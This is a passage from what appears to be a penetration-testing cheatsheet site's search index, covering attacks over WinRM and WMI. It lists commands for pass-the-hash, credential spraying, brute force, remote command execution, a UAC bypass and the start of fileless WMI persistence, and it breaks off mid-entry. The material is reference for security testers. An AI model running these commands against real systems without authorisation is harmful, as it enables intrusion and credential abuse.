\u0026lt;ip\u0026gt; nmap -p 5985,5986 -sV \u0026lt;ip\u0026gt; curl -s http://\u0026lt;ip\u0026gt;:5985/wsman curl -sk https://\u0026lt;ip\u0026gt;:5986/wsman Evil-WinRM # Password auth (HTTP) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; # SSL (HTTPS, port 5986) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -S # Pass-the-Hash (NTLM) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # With scripts and executables directory evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \\ -s /path/to/ps1_scripts/ \\ -e /path/to/executables/ # Within evil-winrm shell menu # Show built-in commands upload /local/file.exe # Upload file download C:\file.txt # Download file Invoke-Binary /local/exe # Run local exe in memory bypass_uac # UAC bypass CrackMapExec # Test credentials crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec winrm 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; # Credential spray crackmapexec winrm \u0026lt;ip\u0026gt; -u users.txt -p \u0026lt;pass\u0026gt; crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt # Pass-the-Hash crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # Execute commands crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; # CMD crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;whoami\u0026#39; # PowerShell crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;Get-Process\u0026#39; PowerShell / Windows Native # Test WinRM connectivity Test-WSMan -ComputerName \u0026lt;ip\u0026gt; Test-WSMan -ComputerName \u0026lt;ip\u0026gt; -UseSSL # Interactive remote session Enter-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential \u0026lt;user\u0026gt; Enter-PSSession -ComputerName \u0026lt;ip\u0026gt; -UseSSL -Credential \u0026lt;user\u0026gt; # Non-interactive / scripted $cred = Get-Credential $sess = New-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential $cred Invoke-Command -Session $sess -ScriptBlock { whoami; hostname } Invoke-Command -ComputerName \u0026lt;ip\u0026gt; -Credential $cred -ScriptBlock { ipconfig } # Copy files over WinRM Copy-Item -Path C:\\local\file.exe -Destination C: emote\\ -ToSession $sess Copy-Item -Path C: emote\\loot.txt -Destination C:\\local\\ -FromSession $sess impacket # winrm_exec (alternative) python3 winrm_exec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Brute Force crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt hydra -l \u0026lt;user\u0026gt; -P wordlist.txt \u0026lt;ip\u0026gt; -s 5985 http-post-form \\ \u0026#34;/wsman:Username=^USER^\u0026amp;Password=^PASS^:401\u0026#34; Common Scenarios Pwned user is in group: \u0026#34;Remote Management Users\u0026#34; → Can use WinRM \u0026#34;Administrators\u0026#34; → Full access via WinRM Check group membership: net localgroup \u0026#34;Remote Management Users\u0026#34; Key Facts Requires user to be in Remote Management Users or Administrators group Can be enabled with: Enable-PSRemoting -Force Firewall rule: WinRM-HTTP-In-TCP (port 5985) Often enabled on Domain Controllers and management servers ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/winrm/","summary":"\u003ch1 id=\"winrm-enumeration-cheatsheet\"\u003eWinRM Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 5985 (HTTP / WS-Management), 5986 (HTTPS)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat is WinRM?\u003c/strong\u003e Windows Remote Management — Microsoft\u0026rsquo;s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 5985,5986 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 5985,5986 -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s http://\u0026lt;ip\u0026gt;:5985/wsman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sk https://\u0026lt;ip\u0026gt;:5986/wsman\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"evil-winrm\"\u003eEvil-WinRM\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password auth (HTTP)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SSL (HTTPS, port 5986)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -S\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash (NTLM)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With scripts and executables directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s /path/to/ps1_scripts/ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -e /path/to/executables/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Within evil-winrm shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emenu \u003cspan style=\"color:#75715e\"\u003e# Show built-in commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eupload /local/file.exe \u003cspan style=\"color:#75715e\"\u003e# Upload file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edownload C:\file.txt \u003cspan style=\"color:#75715e\"\u003e# Download file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Binary /local/exe \u003cspan style=\"color:#75715e\"\u003e# Run local exe in memory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebypass_uac \u003cspan style=\"color:#75715e\"\u003e# UAC bypass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec\"\u003eCrackMapExec\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Credential spray\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u users.txt -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Execute commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# CMD\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# PowerShell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;Get-Process\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell--windows-native\"\u003ePowerShell / Windows Native\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test WinRM connectivity\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTest-WSMan -ComputerName \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTest-WSMan -ComputerName \u0026lt;ip\u0026gt; -UseSSL\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Interactive remote session\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEnter-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential \u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEnter-PSSession -ComputerName \u0026lt;ip\u0026gt; -UseSSL -Credential \u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Non-interactive / scripted\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$sess = New-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Command -Session $sess -ScriptBlock { whoami; hostname }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Command -ComputerName \u0026lt;ip\u0026gt; -Credential $cred -ScriptBlock { ipconfig }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Copy files over WinRM\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCopy-Item -Path C:\\local\file.exe -Destination C:\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eemote\\ -ToSession $sess\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCopy-Item -Path C:\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eemote\\loot.txt -Destination C:\\local\\ -FromSession $sess\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"impacket\"\u003eimpacket\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# winrm_exec (alternative)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 winrm_exec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt \u0026lt;ip\u0026gt; -s \u003cspan style=\"color:#ae81ff\"\u003e5985\u003c/span\u003e http-post-form \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;/wsman:Username=^USER^\u0026amp;Password=^PASS^:401\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-scenarios\"\u003eCommon Scenarios\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePwned user is in group:\n \u0026#34;Remote Management Users\u0026#34; → Can use WinRM\n \u0026#34;Administrators\u0026#34; → Full access via WinRM\n\nCheck group membership:\nnet localgroup \u0026#34;Remote Management Users\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"key-facts\"\u003eKey Facts\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRequires user to be in \u003cstrong\u003eRemote Management Users\u003c/strong\u003e or \u003cstrong\u003eAdministrators\u003c/strong\u003e group\u003c/li\u003e\n\u003cli\u003eCan be enabled with: \u003ccode\u003eEnable-PSRemoting -Force\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFirewall rule: \u003ccode\u003eWinRM-HTTP-In-TCP\u003c/code\u003e (port 5985)\u003c/li\u003e\n\u003cli\u003eOften enabled on Domain Controllers and management servers\u003c/li\u003e\n\u003c/ul\u003e","title":"WinRM"},{"content":"WMI Enumeration Cheatsheet Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)\nWhat is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.\nDetection nmap -p 135 \u0026lt;ip\u0026gt; nmap -p 135 -sV \u0026lt;ip\u0026gt; nmap -p 135 --script msrpc-enum \u0026lt;ip\u0026gt; impacket — wmiexec.py # Interactive shell python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Single command python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u0026#34;whoami\u0026#34; python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u0026#34;ipconfig /all\u0026#34; # Pass-the-Hash python3 wmiexec.py -hashes :\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; python3 wmiexec.py -hashes \u0026lt;lmhash\u0026gt;:\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Without domain (local account) python3 wmiexec.py ./\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; CrackMapExec crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; crackmapexec wmi 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; PowerShell WMI (Local \u0026amp; Remote) # Local system queries Get-WmiObject -Class Win32_OperatingSystem Get-WmiObject -Class Win32_ComputerSystem Get-WmiObject -Class Win32_Process Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Group Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq \u0026#34;Running\u0026#34; } Get-WmiObject -Class Win32_Product # Installed software (slow) Get-WmiObject -Class Win32_LogicalDisk Get-WmiObject -Class Win32_StartupCommand # Startup items # Modern equivalent (CIM) Get-CimInstance -ClassName Win32_OperatingSystem Get-CimInstance -ClassName Win32_Process # Remote queries $cred = Get-Credential Get-WmiObject -Class Win32_OperatingSystem -ComputerName \u0026lt;ip\u0026gt; -Credential $cred Get-WmiObject -Class Win32_Process -ComputerName \u0026lt;ip\u0026gt; -Credential $cred PowerShell WMI Remote Code Execution # Execute command via WMI (leaves process behind) $cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create ` -ArgumentList \u0026#34;cmd.exe /c whoami \u0026gt; C:\\output.txt\u0026#34; ` -ComputerName \u0026lt;ip\u0026gt; -Credential $cred # Check output Get-WmiObject -Class CIM_DataFile -Filter \u0026#34;Name=\u0026#39;C:\\output.txt\u0026#39;\u0026#34; ` -ComputerName \u0026lt;ip\u0026gt; -Credential $cred wmic (Legacy CLI — Windows) :: Local wmic os get Caption,Version,BuildNumber wmic process list brief wmic useraccount list brief wmic group list brief wmic service where \u0026#34;State=\u0026#39;Running\u0026#39;\u0026#34; list brief wmic product get Name,Version :: Installed software wmic startupinfo list full :: Remote wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; os get Caption wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; process call create \u0026#34;cmd.exe /c whoami \u0026gt; C:\\out.txt\u0026#34; wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; useraccount list brief WQL Queries # WQL = WMI Query Language (SQL-like) Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_Process WHERE Name=\u0026#39;lsass.exe\u0026#39;\u0026#34; Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_Service WHERE StartMode=\u0026#39;Auto\u0026#39; AND State=\u0026#39;Stopped\u0026#39;\u0026#34; Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_UserAccount WHERE LocalAccount=True\u0026#34; Metasploit use exploit/windows/smb/psexec # Uses WMI/DCOM under the hood use exploit/windows/local/wmi # Post-exploitation WMI persistence use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM WMI Persistence (Post-Exploitation) # Create permanent WMI event subscription (fileless persistence) $filter = Set-WmiInstance -Class __EventFilter -Namespace \u0026#34;root\\subscription\u0026#34; -Arguments @{ Name = \u0026#34;PentestFilter\u0026#34; EventNameSpace = \u0026#34;root ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/wmi/","summary":"\u003ch1 id=\"wmi-enumeration-cheatsheet\"\u003eWMI Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat is WMI?\u003c/strong\u003e Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e --script msrpc-enum \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"impacket--wmiexecpy\"\u003eimpacket — wmiexec.py\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Interactive shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Single command\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;whoami\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;ipconfig /all\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py -hashes :\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py -hashes \u0026lt;lmhash\u0026gt;:\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Without domain (local 